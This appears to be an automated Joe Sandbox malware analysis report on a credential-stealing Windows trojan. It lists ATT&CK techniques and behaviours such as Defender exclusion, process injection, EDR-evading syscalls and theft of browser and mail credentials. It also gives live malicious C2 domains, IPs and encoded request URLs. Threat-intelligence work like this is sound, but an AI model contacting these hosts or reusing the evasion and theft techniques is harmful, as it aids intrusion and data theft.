                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587945 Sample: QmBbqpEHu0.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 37 www.sssvip2.shop 2->37 39 www.hsa.world 2->39 41 7 other IPs or domains 2->41 49 Suricata IDS alerts for network traffic 2->49 51 Antivirus / Scanner detection for submitted sample 2->51 53 Multi AV Scanner detection for submitted file 2->53 55 5 other signatures 2->55 10 QmBbqpEHu0.exe 4 2->10         started        signatures3 process4 file5 35 C:\Users\user\AppData\...\QmBbqpEHu0.exe.log, ASCII 10->35 dropped 67 Adds a directory exclusion to Windows Defender 10->67 69 Injects a PE file into a foreign processes 10->69 14 QmBbqpEHu0.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 14->71 19 cqvjCApYGBKzop.exe 14->19 injected 73 Loading BitLocker PowerShell Module 17->73 22 WmiPrvSE.exe 17->22         started        24 conhost.exe 17->24         started        process9 signatures10 57 Found direct / indirect Syscall (likely to bypass EDR) 19->57 26 finger.exe 13 19->26         started        process11 signatures12 59 Tries to steal Mail credentials (via file / registry access) 26->59 61 Tries to harvest and steal browser information (history, passwords, etc) 26->61 63 Modifies the context of a thread in another process (thread injection) 26->63 65 3 other signatures 26->65 29 cqvjCApYGBKzop.exe 26->29 injected 33 firefox.exe 26->33         started        process13 dnsIp14 43 dutchdubliners.online 37.97.254.27, 50017, 50018, 50019 TRANSIP-ASAmsterdamtheNetherlandsNL Netherlands 29->43 45 www.allstary.top 199.193.6.134, 50021, 50022, 50023 NAMECHEAP-NETUS United States 29->45 47 4 other IPs or domains 29->47 75 Found direct / indirect Syscall (likely to bypass EDR) 29->75 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                QmBbqpEHu0.exe79%ReversingLabsByteCode-MSIL.Trojan.RedLineStealer
                QmBbqpEHu0.exe63%VirustotalBrowse
                QmBbqpEHu0.exe100%AviraHEUR/AGEN.1362915
                QmBbqpEHu0.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://www.transip.eu/question/110000577/0%Avira URL Cloudsafe
                https://www.transip.eu/knowledgebase/zoeken/0%Avira URL Cloudsafe
                http://www.dutchdubliners.online/7ujc/0%Avira URL Cloudsafe
                https://www.transip.eu/services/search-domains/0%Avira URL Cloudsafe
                https://www.transip.eu/knowledgebase/entry/5885/0%Avira URL Cloudsafe
                http://www.comect.online0%Avira URL Cloudsafe
                http://www.allstary.top/rdvg/0%Avira URL Cloudsafe
                http://www.allstary.top/rdvg/?EzZ=TV3m+ZuR+MuvljvWunhewpdSMahlra0ppdriKzCX4142lV8I6FTOceHwOQEpd9UFqQTrUY1AGfMzy32q1OrbtcsJ52Sl7Z/04EVens9SqotHLWuAZYLLbuM=&BjRxb=8r70fhQxdN4lRB0%Avira URL Cloudsafe
                http://www.hsa.world/09b7/0%Avira URL Cloudsafe
                http://www.dutchdubliners.online/7ujc/?EzZ=WvCg6J2jHD6L/TcyvzGm/cLTtunIwZsLDJOR2qctLrwbpbWmV0+8HmEyzKPQy50wJfwN5AO63TK9GRaTVCmcnK6BZOflUZJxlriydXV/Hhy/YqFf922rQpM=&BjRxb=8r70fhQxdN4lRB0%Avira URL Cloudsafe
                http://www.sssvip2.shop/6t0f/0%Avira URL Cloudsafe
                http://www.comect.online/hmf8/0%Avira URL Cloudsafe
                https://www.transip.eu/question/1000002300%Avira URL Cloudsafe
                https://www.transip.eu/privacy-policy/0%Avira URL Cloudsafe
                http://www.hsa.world/09b7/?EzZ=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&BjRxb=8r70fhQxdN4lRB0%Avira URL Cloudsafe
                http://www.comect.online/hmf8/?EzZ=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ=&BjRxb=8r70fhQxdN4lRB0%Avira URL Cloudsafe
                https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/0%Avira URL Cloudsafe
                https://www.transip.eu/terms-of-service/0%Avira URL Cloudsafe
                http://www.jgkgf.club/tvkp/?EzZ=KBC+qdhE4CeEPBlRbbr/xAo9xQXJnANs+ntD2JrTvmvKK8JoxnFP1tf4O24DvVFUTK8itIRNWKwGZ9ngU4oiptFTC0rH1QaQq1CS+53i55AcWe9W8nwBWKs=&BjRxb=8r70fhQxdN4lRB0%Avira URL Cloudsafe
                http://www.sssvip2.shop/6t0f/?EzZ=MY8WJ01352TVXzFsNodd1NxUli1E4sLIDPBPQPgfoKZiJVfQ3vqQHTL/6etRwfvFnZBRJEUa5B9wCMX79XLhBfQQAkU843AvbtgeEKbWrrYxtYrhlbwkADc=&BjRxb=8r70fhQxdN4lRB0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.comect.online
                		124.6.61.130
                		truetrue
                  		unknown
                  www.allstary.top
                  		199.193.6.134
                  		truetrue
                    		unknown
                    ccchhua889911.222tt.icu
                    		172.247.112.164
                    		truetrue
                      		unknown
                      www.sssvip2.shop
                      		156.253.8.115
                      		truetrue
                        		unknown
                        www.hsa.world
                        		13.248.169.48
                        		truetrue
                          		unknown
                          dutchdubliners.online
                          		37.97.254.27
                          		truetrue
                            		unknown
                            www.16v9tiu00r.ink
                            		unknown
                            		unknownfalse
                              		unknown
                              www.dutchdubliners.online
                              		unknown
                              		unknownfalse
                                		unknown
                                www.jgkgf.club
                                		unknown
                                		unknownfalse
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.dutchdubliners.online/7ujc/?EzZ=WvCg6J2jHD6L/TcyvzGm/cLTtunIwZsLDJOR2qctLrwbpbWmV0+8HmEyzKPQy50wJfwN5AO63TK9GRaTVCmcnK6BZOflUZJxlriydXV/Hhy/YqFf922rQpM=&BjRxb=8r70fhQxdN4lRBtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dutchdubliners.online/7ujc/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.allstary.top/rdvg/?EzZ=TV3m+ZuR+MuvljvWunhewpdSMahlra0ppdriKzCX4142lV8I6FTOceHwOQEpd9UFqQTrUY1AGfMzy32q1OrbtcsJ52Sl7Z/04EVens9SqotHLWuAZYLLbuM=&BjRxb=8r70fhQxdN4lRBtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.allstary.top/rdvg/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.hsa.world/09b7/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.sssvip2.shop/6t0f/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.comect.online/hmf8/true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.comect.online/hmf8/?EzZ=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ=&BjRxb=8r70fhQxdN4lRBtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.hsa.world/09b7/?EzZ=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&BjRxb=8r70fhQxdN4lRBtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.sssvip2.shop/6t0f/?EzZ=MY8WJ01352TVXzFsNodd1NxUli1E4sLIDPBPQPgfoKZiJVfQ3vqQHTL/6etRwfvFnZBRJEUa5B9wCMX79XLhBfQQAkU843AvbtgeEKbWrrYxtYrhlbwkADc=&BjRxb=8r70fhQxdN4lRBtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.jgkgf.club/tvkp/?EzZ=KBC+qdhE4CeEPBlRbbr/xAo9xQXJnANs+ntD2JrTvmvKK8JoxnFP1tf4O24DvVFUTK8itIRNWKwGZ9ngU4oiptFTC0rH1QaQq1CS+53i55AcWe9W8nwBWKs=&BjRxb=8r70fhQxdN4lRBtrue
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabfinger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designersGQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designers/?QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cn/bTheQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designers?QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.transip.eu/knowledgebase/zoeken/finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.comect.onlinecqvjCApYGBKzop.exe, 0000000B.00000002.3587260572.000000000146C000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.transip.eu/services/search-domains/cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.tiro.comQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.transip.nl/services/search-domains/cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://www.transip.nl/vragen/110000534/finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designersQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://transip.nl/cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          http://www.goodfont.co.krQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.sajatypeworks.comQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.typography.netDQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.founder.com.cn/cn/cTheQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.galapagosdesign.com/staff/dennis.htmQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://nl.trustpilot.com/review/www.transip.nlfinger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.transip.eu/question/110000577/finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://transip.nl/cp/finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfinger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.transip.nl/algemene-voorwaarden/finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.galapagosdesign.com/DPleaseQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.transip.nl/vragen/198/finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.fonts.comQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.sandoll.co.krQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.transip.nl/privacy-policy/finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.urwpp.deDPleaseQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.transip.eu/knowledgebase/entry/5885/finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.zhongyicts.com.cnQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQmBbqpEHu0.exe, 00000000.00000002.3592498546.0000000002941000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.sakkal.comQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.apache.org/licenses/LICENSE-2.0QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.fontbureau.comQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://transip.eu/cp/finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icofinger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://transip.eu/cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.transip.eu/question/100000230finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://www.ecosia.org/newtab/finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.carterandcone.comlQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://trustpilot.com/review/www.transip.nlfinger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.transip.nl/vragen/110000580/finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://ac.ecosia.org/autocomplete?q=finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.fontbureau.com/designers/cabarga.htmlNQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.founder.com.cn/cnQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.fontbureau.com/designers/frere-user.htmlQmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.transip.nl/vragen/110000572finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.jiyu-kobo.co.jp/QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.transip.eu/privacy-policy/finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://www.fontbureau.com/designers8QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.transip.nl/knowledgebase/zoeken/finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.transip.eu/terms-of-service/finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high

                                                                                                                                    World Map of Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public IPs

                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    124.6.61.130
                                                                                                                                    		www.comect.onlineSingapore
                                                                                                                                    		132425APC-HOSTING-SGAPCHostingPteLtdSGtrue
                                                                                                                                    13.248.169.48
                                                                                                                                    		www.hsa.worldUnited States
                                                                                                                                    		16509AMAZON-02UStrue
                                                                                                                                    37.97.254.27
                                                                                                                                    		dutchdubliners.onlineNetherlands
                                                                                                                                    		20857TRANSIP-ASAmsterdamtheNetherlandsNLtrue
                                                                                                                                    172.247.112.164
                                                                                                                                    		ccchhua889911.222tt.icuUnited States
                                                                                                                                    		40065CNSERVERSUStrue
                                                                                                                                    156.253.8.115
                                                                                                                                    		www.sssvip2.shopSeychelles
                                                                                                                                    		132813AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHKtrue
                                                                                                                                    199.193.6.134
                                                                                                                                    		www.allstary.topUnited States
                                                                                                                                    		22612NAMECHEAP-NETUStrue

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                                                    Analysis ID:1587945
                                                                                                                                    Start date and time:2025-01-10 19:44:13 +01:00
                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 9m 36s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                    Run name:Run with higher sleep bypass
                                                                                                                                    Number of analysed new started processes analysed:12
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:2
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Sample name:QmBbqpEHu0.exe
                                                                                                                                    renamed because original name is a hash value
                                                                                                                                    Original Sample Name:80639535a88aa7662bb05425e5c1c3520c7642da20a0feaed308fec754661e89.exe
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@11/7@11/6
                                                                                                                                    EGA Information:
                                                                                                                                    • Successful, ratio: 75%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 92%
                                                                                                                                    • Number of executed functions: 109
                                                                                                                                    • Number of non-executed functions: 302
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                                                    Warnings

                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.245.163.56, 13.107.246.45
                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
